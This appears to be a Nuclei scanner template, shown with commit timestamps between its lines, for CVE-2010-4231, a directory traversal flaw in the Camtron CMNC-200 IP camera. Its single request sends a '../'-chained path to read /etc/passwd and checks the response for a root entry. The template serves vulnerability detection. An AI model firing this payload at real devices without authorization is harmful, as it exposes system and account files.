2021-07-16 17:29:30 +00:00
id : CVE-2010-4231
info :
name : Camtron CMNC-200 IP Camera - Directory Traversal
author : daffainfo
severity : high
2022-02-21 18:33:16 +00:00
description : The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to access sensitive files and directories on the camera.
2023-09-06 13:22:34 +00:00
remediation : Upgrade to a supported product version.
2021-08-18 11:37:49 +00:00
reference :
2021-07-20 14:20:02 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
2022-05-17 09:18:12 +00:00
- https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
2022-05-17 20:46:49 +00:00
- http://www.exploit-db.com/exploits/15505/
2024-01-29 17:11:14 +00:00
- https://github.com/K3ysTr0K3R/CVE-2010-4231-EXPLOIT
2022-02-21 18:33:16 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
2023-07-11 19:49:27 +00:00
cvss-score : 7.8
2022-02-21 18:33:16 +00:00
cve-id : CVE-2010-4231
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2023-08-31 11:46:18 +00:00
epss-score : 0.01615
2024-05-31 19:23:20 +00:00
epss-percentile : 0.87445
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : camtron
product : cmnc-200_firmware
2023-12-05 09:50:33 +00:00
tags : cve,cve2010,iot,lfi,camera,edb,camtron
2021-07-16 17:29:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-16 17:29:30 +00:00
- method : GET
path :
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-16 17:29:30 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4b0a00483046022100ef798e04d208e6c7944c2de7bd37f63fcc958b0834ef7b0cf0a355a7b866fb15022100c6442d68055cef043c33708877f3fc2667950bb0befd604648e255086d34cac7:922c64590222798bb761d5b6d8e72950